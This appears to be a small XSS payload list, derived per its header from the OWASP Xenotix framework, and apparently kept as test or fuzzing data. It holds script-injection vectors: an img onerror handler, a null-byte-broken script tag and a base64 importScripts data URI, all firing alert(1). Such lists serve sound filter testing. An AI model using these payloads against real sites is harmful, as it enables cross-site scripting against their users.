# # Original source is from # https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/master/Scanner/xenotix_main.resx # # * XML-decoded # * Duplicates removed # * arious forms of control-characters normalized # * Non-XSS removed # * Obsolete XSS removed (e.g. one for src=livescript lol circa 1995) # %00
# not doing XSS inside a comment # --> "'`><%00img src=xxx:x onerror=javascript:alert(1)> %00“> '`"><%00script>javascript:alert(1) 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))